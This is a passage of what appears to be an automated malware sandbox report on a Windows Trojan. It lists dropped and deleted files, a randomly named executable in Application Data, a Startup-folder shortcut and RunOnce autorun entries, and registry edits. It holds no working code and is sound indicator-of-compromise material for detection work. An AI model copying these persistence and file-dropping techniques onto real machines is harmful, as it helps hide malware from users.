%System%\GroupPolicy\Adm\windowsremotemanagement.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4A.tmp (0 bytes)
%WinDir%\SECD0.tmp (0 bytes)
%System%\GroupPolicy\Adm\EventForwarding.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4D.tmp (0 bytes)
%System%\winrmprov.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAF.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET91.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET87.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET44.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET1C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB6.tmp (0 bytes)
%System%\wsmprovhost.exe (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC2.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET55.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\Examples\SETBC.tmp (0 bytes)
%System%\winrmprov.mof (0 bytes)
%WinDir%\imsins.BAK (0 bytes)
%System%\SETB.tmp (0 bytes)
%System%\SET1F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET98.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET94.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET95.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET65.tmp (0 bytes)
%WinDir%\inf\oem10.inf (0 bytes)
%System%\SET28.tmp (0 bytes)
%System%\SET5.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET92.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA4.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET45.tmp (0 bytes)
%System%\winrshost.exe (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9A.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6E.tmp (0 bytes)
%System%\SET31.tmp (0 bytes)
%WinDir%\inf\SET18.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAC.tmp (0 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\@.lnk (0 bytes)
%System%\WsmPty.xsl (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3A.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET89.tmp (0 bytes)
%System%\SET29.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET82.tmp (0 bytes)
%System%\WsmRes.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB5.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7A.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCD.tmp (0 bytes)
%WinDir%\Temp\UPD3.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET69.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA9.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAD.tmp (0 bytes)
%System%\SET2C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC1.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8D.tmp (0 bytes)
%System%\SET15.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4C.tmp (0 bytes)
%System%\wbem\SET1E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET61.tmp (0 bytes)
%System%\SET2D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAA.tmp (0 bytes)
%System%\SET24.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB1.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET52.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET43.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET70.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET96.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET93.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET50.tmp (0 bytes)
%System%\winrssrv.dll (0 bytes)
%WinDir%\inf\WindowsRemoteShell.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7B.tmp (0 bytes)
%System%\winrm\0409\SET1D.tmp (0 bytes)
%System%\SETD.tmp (0 bytes)
%System%\SET10.tmp (0 bytes)
%WinDir%\inf\SET19.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET47.tmp (0 bytes)
%System%\SET9.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8A.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETC6.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6B.tmp (0 bytes)
%System%\winrm\0409\SET37.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB9.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETBB.tmp (0 bytes)
%System%\winrs.exe (0 bytes)
%System%\WindowsPowerShell\v1.0\SET60.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCB.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET39.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET40.tmp (0 bytes)
%System%\SET2F.tmp (0 bytes)
%WinDir%\Help\SETC5.tmp (0 bytes)
%System%\WsmSvc.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SET78.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET71.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6A.tmp (0 bytes)
%System%\winrsmgr.dll (0 bytes)
%System%\SET30.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA8.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB8.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET1A.tmp (0 bytes)
%System%\SET23.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET42.tmp (0 bytes)
%System%\WsmTxt.xsl (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAB.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET77.tmp (0 bytes)
%WinDir%\inf\SET33.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET83.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB4.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET63.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET68.tmp (0 bytes)
The process mscorsvw.exe:2656 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD3.tmp\Microsoft.PowerShell.Commands.Management.dll (45020 bytes)
The Trojan deletes the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD3.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index5a.dat (0 bytes)
The process mscorsvw.exe:3536 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDB.tmp\Microsoft.WSMan.Runtime.dll (17713 bytes)
The Trojan deletes the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\index62.dat (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDB.tmp (0 bytes)
The process mscorsvw.exe:2320 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD2.tmp\Microsoft.PowerShell.Commands.Diagnostics.dll (33116 bytes)
The Trojan deletes the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD2.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index59.dat (0 bytes)
The process mscorsvw.exe:524 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD7.tmp\Microsoft.PowerShell.GPowerShell.dll (50011 bytes)
The Trojan deletes the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD7.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index5e.dat (0 bytes)
The process mscorsvw.exe:2360 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v4.0.30319\ngen_service.log (514 bytes)
%WinDir%\Microsoft.NET\Framework\v4.0.30319\NGEN_SERVICE.LOG (83393 bytes)
The process mscorsvw.exe:2580 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD8.tmp\Microsoft.PowerShell.GraphicalHost.dll (47422 bytes)
The Trojan deletes the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD8.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index5f.dat (0 bytes)
The process mscorsvw.exe:3724 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD5.tmp\Microsoft.PowerShell.ConsoleHost.dll (33378 bytes)
The Trojan deletes the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\index5c.dat (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD5.tmp (0 bytes)
The process mscorsvw.exe:3720 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDC.tmp\System.Management.Automation.dll (105990 bytes)
The Trojan deletes the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\index63.dat (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDC.tmp (0 bytes)
The process mscorsvw.exe:3204 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD4.tmp\Microsoft.PowerShell.Commands.Utility.dll (40638 bytes)
The Trojan deletes the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index5b.dat (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD4.tmp (0 bytes)
The process mscorsvw.exe:3224 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDA.tmp\Microsoft.WSMan.Management.dll (34061 bytes)
The Trojan deletes the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDA.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index61.dat (0 bytes)
The process mscorsvw.exe:3036 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD9.tmp\Microsoft.PowerShell.Security.dll (35530 bytes)
The Trojan deletes the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD9.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index60.dat (0 bytes)
The process mscorsvw.exe:1768 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD6.tmp\Microsoft.PowerShell.Editor.dll (64500 bytes)
The Trojan deletes the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD6.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index5d.dat (0 bytes)
The process mscorsvw.exe:2008 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD1.tmp\Microsoft.BackgroundIntelligentTransfer.Management.dll (27440 bytes)
The Trojan deletes the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD1.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index58.dat (0 bytes)
The process PSCustomSetupUtil.exe:452 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\M7ADGJNQ\Microsoft.PowerShell.ConsoleHost.resources.dll (1552 bytes)
The process PSCustomSetupUtil.exe:1096 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\SIMQUY25\Microsoft.PowerShell.Security.resources.dll (9 bytes)
The process PSCustomSetupUtil.exe:2824 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\TGKNQUX0\Microsoft.PowerShell.GPowerShell.resources.dll (1552 bytes)
The process PSCustomSetupUtil.exe:4024 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\5UY26AEJ\Microsoft.PowerShell.Commands.Management.dll (9320 bytes)
The process PSCustomSetupUtil.exe:252 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\VJNRVZ37\Microsoft.WSMan.Runtime.dll (7 bytes)
The process PSCustomSetupUtil.exe:2800 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\YKOSW048\Microsoft.PowerShell.Editor.resources.dll (2392 bytes)
The process PSCustomSetupUtil.exe:796 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\7RUY147A\Microsoft.PowerShell.Commands.Diagnostics.resources.dll (10 bytes)
The process PSCustomSetupUtil.exe:4064 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\QBEILORU\Microsoft.PowerShell.Commands.Utility.dll (20624 bytes)
The process PSCustomSetupUtil.exe:320 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\3NQUX036\Microsoft.BackgroundIntelligentTransfer.Management.dll (1856 bytes)
The process PSCustomSetupUtil.exe:2648 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\QDHLOSW0\Microsoft.PowerShell.GraphicalHost.dll (9608 bytes)
The process PSCustomSetupUtil.exe:4092 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\SCFJMPSV\Microsoft.PowerShell.Security.dll (2392 bytes)
The process PSCustomSetupUtil.exe:584 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\G037ADGJ\Microsoft.PowerShell.Commands.Utility.resources.dll (1552 bytes)
The process PSCustomSetupUtil.exe:2708 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\CWZ269CF\Microsoft.PowerShell.Editor.dll (32824 bytes)
The process PSCustomSetupUtil.exe:2696 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\3NQTW036\Microsoft.PowerShell.GPowerShell.dll (22192 bytes)
The process PSCustomSetupUtil.exe:1880 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\WJOSX16A\Microsoft.WSMan.Management.resources.dll (13 bytes)
The process PSCustomSetupUtil.exe:1992 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\I269CFIM\System.Management.Automation.resources.dll (9320 bytes)
The process PSCustomSetupUtil.exe:1540 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\1LOSVY14\Microsoft.PowerShell.Commands.Diagnostics.dll (3616 bytes)
The process PSCustomSetupUtil.exe:1288 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\WKOSW048\Microsoft.WSMan.Management.dll (9608 bytes)
The process PSCustomSetupUtil.exe:2756 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\SEIMQUY2\Microsoft.PowerShell.GraphicalHost.resources.dll (784 bytes)
The process PSCustomSetupUtil.exe:3964 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\6VY26AEI\System.Management.Automation.dll (81046 bytes)
The process PSCustomSetupUtil.exe:3988 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\PADGJNQT\Microsoft.PowerShell.ConsoleHost.dll (7192 bytes)
The process PSCustomSetupUtil.exe:648 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\AUX047AD\Microsoft.BackgroundIntelligentTransfer.Management.resources.dll (7 bytes)
The process PSCustomSetupUtil.exe:2008 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\O8BEHLOR\Microsoft.PowerShell.Commands.Management.resources.dll (1552 bytes)
The process UUPPHBZOfNIWNOEBZBhdR.exe:1076 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\UUPPHBZOfNIWNOEBZBhdR.exe (5441 bytes)
%Documents and Settings%\%current user%\Application Data\UUPPHBZOfNIWNOEBZBh (39 bytes)
%Documents and Settings%\%current user%\Application Data\TcEMbLQgCOBP (1281 bytes)
The process regsvr32.exe:2380 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\WindowsXP-KB968930-x86-ENG[1].exe (2977755 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WindowsXP-KB968930-x86-ENG.exe (45823 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\WindowsXP-KB968930-x86-ENG[1].exe (0 bytes)
The process regsvr32.exe:324 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\2b086d\d4387d.48198b5 (9 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@microsoft[1].txt (162 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\uk-ua[1].htm (27121 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\bcb529\c53169.lnk (801 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\bcb529\228ab4.48198b5 (49 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (776 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@microsoft[2].txt (162 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Startup\48d1ef.lnk (745 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ohev\ohev.exe (155 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\bcb529\910776.bat (94 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Cookies\Current_User@microsoft[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ohev\ohev.exe (0 bytes)
%System%\wscript.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\uk-ua[1].htm (0 bytes)
Registry activity
The process %original file name%.exe:312 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "13 AD 23 C1 26 2E 2B 3E 8C B9 07 4F 2E C1 B6 EA"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"wextract_cleanup0" = "rundll32.exe %System%\advpack.dll,DelNodeRunDLL32 C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP\"
The Trojan deletes the following value(s) in system registry:
The Trojan disables automatic startup of the application by deleting the following autorun value:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"wextract_cleanup0"
The process PSSetupNativeUtils.exe:3556 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A6 88 23 BE BA 5F D1 A3 D1 70 1F 6C 97 2C 31 EE"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
The process mofcomp.exe:3924 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D8 59 3D 9F 44 CE 09 98 AF 84 12 A4 F4 B3 95 F8"
The process wscript.exe:1992 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "54 2C 8E 59 12 B1 94 33 4C 1E 13 4E 5A 19 E1 B8"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE]
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE]
"(Default)"
The process WindowsXP-KB968930-x86-ENG.exe:2764 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EF 3F 27 9D 39 C8 7A 26 22 FE 9E D6 BF F5 8E 97"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\c:\82ea8d5099742dc8f49f42\microsoft.powershell.gpowershell.dll,"
The process ngen.exe:2472 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C2 F8 AF 26 E1 2F DB 27 EA 76 93 81 97 14 C7 B1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"
The process ngen.exe:2904 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C0 87 88 C1 44 ED 53 AA 1C 8C ED C6 04 95 EC 04"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
The process ngen.exe:2456 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C1 8A 95 A8 BA 69 FE 11 37 40 93 E6 EE E2 1E 55"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
"Status" = "3"
The process ngen.exe:2564 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A6 CB 3B 19 B1 CC 1A C3 29 AF F4 D9 A2 A8 53 68"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
The process ngen.exe:3000 makes changes in the system registry.
